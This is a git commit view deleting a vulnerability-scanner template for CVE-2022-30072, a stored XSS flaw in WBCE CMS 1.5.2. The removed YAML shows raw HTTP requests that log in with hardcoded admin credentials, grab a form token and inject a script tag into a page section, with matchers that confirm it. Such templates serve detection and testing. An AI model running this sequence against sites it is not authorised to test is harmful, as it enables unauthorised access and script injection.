Delete CVE-2022-30072.yaml
parent
1633c093b3
commit
10d7609103
|
@ -1,73 +0,0 @@
|
|||
id: CVE-2022-30072
|
||||
|
||||
info:
|
||||
name: WBCE CMS v1.5.2 XSS Stored
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
WBCE CMS 1.5.2 is vulnerable to Cross Site Scripting (XSS) via \admin\pages\sections_save.php namesection2 parameters.
|
||||
reference:
|
||||
- https://github.com/APTX-4879/CVE
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30072
|
||||
metadata:
|
||||
verified: true
|
||||
tags: wbcecms,xss
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wbcecms/wbce/admin/login/index.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh=admin&password_axh5kevh=Admin@123&submit=Login
|
||||
|
||||
- |
|
||||
GET /wbcecms/wbce/admin/users/index.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
- |
|
||||
POST /wbcecms/wbce/admin/pages/add.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
formtoken={{formtoken}}&title=final&type=wysiwyg&parent=0&visibility=public&save=
|
||||
|
||||
- |
|
||||
POST /wbcecms/wbce/admin/pages/sections_save.php?page_id=1 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
formtoken={{formtoken}}&page_id=1§ion_id=1&block1=1&namesection1=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&start_date1=04.07.2022+15%3A46&end_date1=19.07.2022+15%3A46&saveandback=saveandback
|
||||
|
||||
- |
|
||||
GET /wbcecms/wbce/admin/pages/modify.php?page_id=1 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
cookie-reuse: true
|
||||
extractors:
|
||||
- type: regex # type of extractor
|
||||
name: formtoken # defining the variable name
|
||||
part: body # part of response to look for
|
||||
group: 1
|
||||
regex:
|
||||
- '<input\stype="hidden"\sname="formtoken"\svalue="([^"]*)"\s/>'
|
||||
internal: true
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<script>alert(1)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue